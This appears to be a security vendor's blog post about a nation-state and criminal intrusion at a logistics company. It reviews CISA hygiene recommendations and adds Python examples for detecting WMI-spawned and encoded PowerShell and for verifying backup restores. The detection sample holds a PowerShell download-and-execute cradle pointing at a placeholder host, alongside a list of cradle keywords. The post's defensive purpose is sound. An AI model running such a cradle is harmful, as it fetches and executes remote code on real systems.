“You’ve been hacked; it was by a nation-state.”
Companies receive this message from their managed IT service providers or incident response firms more and more every day. Traditionally, nation-states focused on hacking other nation-states, but a new reality is emerging. Nation-backed hackers (referred to as Advanced Persistent Threats, or APTs) now target commercial and public organizations across domains, regardless of size.
For example, APT groups are increasingly targeting outsourced IT service companies, often called managed service providers (MSPs). While MSPs have good IT network and security knowledge, most do not have the level of training and internal resources necessary to detect, stop, and remediate an attack by a nation-state APT. As a result, APT groups see MSPs as a low-risk, high-reward target: if they infiltrate an MSP’s network, they can also gain direct privileged access to the networks of all the MSP’s clients.
The Cybersecurity and Infrastructure Security Agency (CISA) recently released an Insight Report that specifically warned of increased threats from Iranian nation-state APT groups due to the tensions between the United States and Iran. While the recommendations are nothing revolutionary, it is important to understand why the information security industry so often makes recommendations based on basic IT hygiene.
- Industry: Logistical Supply Chain
- Endpoints: 5000
- Threat Actor(s): APT33, APT34, Criminal Organization
- Tools used: Dridex, POWRUNER
To set the stage, the attack is occurring in a 5000+ device network with limited security technology and policies and Blackpoint is in the process of deploying its SNAP-Defense and NICOS technologies as well as the commercial endpoint security products Webroot and Sophos. Blackpoint’s NICOS appliance was the first to discover unusual activity; security analysts observed SSH activity and port scans that were outside the normal use case for this network.
Blackpoint’s Security Operations Center (SOC) immediately contacted the company to request they expedite the deployment of the remaining cyber security technologies (SNAP-Defense, Webroot, and Sophos). Once these technologies were fully deployed, Blackpoint’s security analysts started to observe the abuse of a legitimate Windows technology, Windows Management Instrumentation (WMI), to spread Dridex. Dridex gained notoriety for its ability to steal banking credentials, but has recently evolved into a delivery mechanism for ransomware and has the ability to establish virtual networks and delete files.
Blackpoint analysts also detected LogMeIn, a commercial remote access application, being used as a persistence method in this environment. This legitimate business application allowed the attackers to maintain a foothold inside the environment even after the device was restarted. The initial findings led the Blackpoint team to believe this was the work of a Russian criminal enterprise, but after further investigation, the analysts found more command and control servers used by APT33 and APT34 along with tradecraft attributed to these groups.
The above SNAP-Defense screenshot shows an alert for a Base64 encoded PowerShell script. This script was identified as a variant of POWRUNER, a known tool in the APT34 arsenal that allows the group to send and receive commands from the control server. Other attacker tools present in the environment were keyloggers, clipboard content collectors, and device information grabbers.
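As an added illustration (not code from the article or from Blackpoint's products) of how the two behaviours described above can be caught from endpoint telemetry, the script below runs two detection rules over constructed Sysmon-style process-creation records: it flags command interpreters spawned by the WMI provider host (WmiPrvSE.exe), and it decodes PowerShell `-EncodedCommand` payloads (UTF-16LE inside Base64) to look for download-cradle keywords. The event fields, the `example.invalid` URL and the encoded script are all constructed for the example.

```python
import base64
import ntpath
import re
from dataclasses import dataclass

# Interpreters that should rarely, if ever, be children of the WMI provider host.
WMI_HOSTS = {"wmiprvse.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Keywords typical of a download-and-execute cradle inside a decoded script.
SUSPICIOUS_TOKENS = ("downloadstring", "downloadfile", "invoke-expression", "iex ", "iex(",
                     "frombase64string", "net.webclient", "invoke-webrequest")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the documented -ec.
_ENC_PREFIXES = ["encodedcommand"[:i] for i in range(14, 0, -1)] + ["ec"]
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Alert:
    pid: int
    rule: str
    detail: str
    tokens: tuple = ()


def analyze_event(event: dict) -> list:
    """Apply both rules to one process-creation record and return any alerts."""
    alerts = []
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent in WMI_HOSTS and image in INTERPRETERS:
        alerts.append(Alert(event["pid"], "wmi_spawned_interpreter", f"{parent} -> {image}"))
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(event["command_line"])
        if decoded is not None:
            hits = tuple(t for t in SUSPICIOUS_TOKENS if t in decoded.lower())
            alerts.append(Alert(event["pid"], "encoded_powershell", decoded, hits))
    return alerts


def analyze_events(events) -> list:
    return [a for e in events for a in analyze_event(e)]


# Constructed sample telemetry; these are not records from the incident in the article.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"pid": 5216, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "powershell.exe -NoP -W Hidden -EncodedCommand "
                     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')")},
    {"pid": 3300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"pid": 7004, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for alert in analyze_events(SAMPLE_EVENTS):
        print(f"pid={alert.pid} rule={alert.rule} tokens={alert.tokens} detail={alert.detail[:60]}")
```

The decoded script, not the Base64 blob, is what should be surfaced to an analyst; matching keywords on the encoded form misses everything, because the same command encodes differently with a single changed character. Treat the parent-process rule as high signal on its own: legitimate software rarely needs WmiPrvSE.exe to launch a shell.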
Analysis revealed that APT34 was either creating a diversion by impersonating a criminal organization to allow other tools to go unnoticed, or this network was breached by both APT groups and a for-profit criminal enterprise; additional analysis indicated that it was most likely the latter.
The point of entry for these breaches is not 100% confirmed, but Blackpoint’s investigation, along with investigation by other security vendors, revealed it was most likely a two-pronged attack: a phishing campaign with the goal of credential harvesting, and a vulnerability in an unpatched SharePoint server. Let’s now look at the recommendations in CISA’s Insight Report.
If the targeted company had a better understanding of their exposure and the threat landscape, they may have been better prepared. Knowing as an organization where your vulnerabilities lie, as well as knowing your adversaries’ capabilities, are the first steps to closing security gaps in your IT environment.
End-User Training
The main contributor to successful cyber-attacks continues to be failures at layer 8 of the OSI model. For those unfamiliar with the OSI model, it actually ends at layer 7; “layer 8” is shorthand for the human element, the user. Consistent and appropriate training for your end-users and IT team will improve your overall security posture. Reward them when they report phishing. If they make a mistake and click a link, do not rebuke them unless it is a chronic issue; thank them for being honest and owning up to their mistake so you can immediately activate a response plan. Proper training may have saved the company in the example above if the employees had recognized the phishing emails or had immediately notified their IT security team when they mistakenly opened them.
Patching and Vulnerability Scanning
If you are not following proper patch schedules, you are leaving your front door wide open for a malicious actor to walk in. Patching is an essential security activity that is not flashy or fun, but it is by far one of the most important. An unpatched environment is highly susceptible regardless of any next-gen security technologies employed. If you are unsure what needs to be patched, a vulnerability scan may be necessary.
Account Protections such as 2FA
While not the ultimate solution to security, two-factor authentication (2FA) makes it exponentially harder for hackers to access devices and applications. Implementing company-wide 2FA dramatically reduces the chances that user account credentials are stolen and used to deploy malware.
Backups and Backup testing
When you operate under an assume-breach mentality as we do, you should always have a last-resort plan in place. Backups will make recovery easier, but they are worthless without ensuring they are operating properly on a daily basis. In the company example above, no uninfected backups existed, so this recovery option was not available.
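An added example, not the article's, of the "ensure they are operating properly" step: a restore-verification routine that records a SHA-256 manifest when a backup is taken and later compares a restored copy against it, reporting files that are missing, altered or unexpected. The directory layout, file contents and the simulated corruption are constructed inside `demo_round_trip`, and the temporary directories stand in for a real backup target.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_file(path: str) -> str:
    """Stream the file so large backup artefacts do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: str) -> dict:
    """Map every file under root (relative, '/'-separated) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_restore(manifest: dict, restored_root: str) -> dict:
    """Compare a restored tree with the manifest taken at backup time."""
    restored = build_manifest(restored_root)
    report = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    for rel, digest in manifest.items():
        if rel not in restored:
            report["missing"].append(rel)
        elif restored[rel] != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    report["unexpected"] = list(set(restored) - set(manifest))
    return {key: sorted(value) for key, value in report.items()}


def demo_round_trip() -> dict:
    """Constructed scenario: back up three files, restore them, then damage the restore."""
    work = tempfile.mkdtemp(prefix="backup-demo-")
    try:
        src = os.path.join(work, "source")
        os.makedirs(os.path.join(src, "db"))
        for rel, body in {"db/ledger.sql": b"INSERT INTO ledger VALUES (1, 100);\n",
                          "config.ini": b"[service]\nport=8443\n",
                          "notes.txt": b"constructed sample content\n"}.items():
            with open(os.path.join(src, rel), "wb") as fh:
                fh.write(body)
        manifest = build_manifest(src)          # what a nightly job would persist off-host

        restore = os.path.join(work, "restore")
        shutil.copytree(src, restore)
        # Simulate a silently corrupted file, a file that never came back, and stray content.
        with open(os.path.join(restore, "db", "ledger.sql"), "ab") as fh:
            fh.write(b"-- tampered\n")
        os.remove(os.path.join(restore, "notes.txt"))
        with open(os.path.join(restore, "extra.tmp"), "wb") as fh:
            fh.write(b"leftover\n")
        return verify_restore(manifest, restore)
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    for key, files in demo_round_trip().items():
        print(f"{key:10s} {files}")
```

A manifest is only useful if it is stored somewhere the backup itself cannot reach, otherwise ransomware that encrypts the backup can rewrite the manifest to match; the same isolation that protects the backup copy applies to the record used to verify it.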
Network Traffic Monitoring
Without the proper technology in place to provide visibility into your network, you will have limited context into which devices are communicating and with whom. The chances of detecting a nation-state hack through traditional endpoint protection are extremely low. While endpoint protection is a necessary layer in a company’s cyber security stack, many endpoint security tools cannot detect attacker activity that relies on tools already present in the infrastructure to move around. These methods are known as living off the land, and they are an increasingly popular choice for hackers.
Application Whitelisting
Only allowing approved applications to run on your devices greatly reduces cyber risk. If the infected company above had used application whitelisting, the LogMeIn persistence tactic would have failed and an alternative, possibly malicious, tool would have been necessary, which may have increased the chances of a traditional anti-virus being able to detect and quarantine the threat.
Incident Response Plan
Finally, you need to know what to do when a nation-state or domestic threat is at the door. Know your tools, know your phone numbers, know who does what and when. Practice various cyber attack scenarios in round-table discussions and role-play exercises. The above company was ill-prepared to deal with a breach and was forced to develop an ad-hoc response plan during one of the most stressful times; do not let that happen to you: plan and prepare.
We hope this article encourages you to implement the best practices listed above before an attack occurs, strengthening your cyber security posture, lowering your risk, and helping you defend against even nation-state attacks. Do not allow your company to be caught off guard – the consequences could be catastrophic.